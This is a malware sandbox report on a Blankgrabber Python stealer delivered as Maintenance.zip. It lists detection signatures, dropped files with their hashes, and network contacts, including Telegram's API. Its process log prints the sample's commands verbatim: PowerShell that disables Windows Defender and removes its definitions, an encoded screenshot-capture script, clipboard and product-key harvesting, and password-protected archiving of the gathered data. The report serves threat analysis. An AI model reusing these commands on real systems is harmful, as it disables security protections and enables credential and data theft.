Analysis Overview
SHA256
cf428bdbd8985af9eb3e137b4dd206df0583c06a144a8252acc1979e9ccb225c
Threat Level: Known bad
The file Maintenance.zip was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Gathers system information
Enumerates processes with tasklist
Detects videocard installed
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-30 19:13
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win7-20240508-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
| PID 1716 wrote to memory of 2636 | N/A | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe | C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI17162\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
memory/2636-23-0x000007FEF5F70000-0x000007FEF6559000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10-20240404-en
Max time kernel
132s
Max time network
138s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AAC.tmp" "c:\Users\Admin\AppData\Local\Temp\xekh2uue\CSCCD4F73C5ACAD48F4AFE3FECBF2D4D04C.TMP"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\fhrnN.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\fhrnN.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI39842\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/1888-29-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39842\base_library.zip
| MD5 | 9dc12ea9f7821873da74c772abb280f0 |
| SHA1 | 3f271c9f54bc7740b95eaa20debbd156ebd50760 |
| SHA256 | c5ec59385bfac2a0ac38abf1377360cd1fddd05c31f8a8b4e44252e0e63acb10 |
| SHA512 | a3175c170bbb28c199ab74ad3116e71f03f124d448bf0e9dd4afcacdc08a7a52284cf858cfd7e72d35bd1e68c6ba0c2a1a0025199aeb671777977ea53e1f2535 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ctypes.pyd
| MD5 | 26e65481188fe885404f327152b67c5e |
| SHA1 | 6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d |
| SHA256 | b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786 |
| SHA512 | 5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll
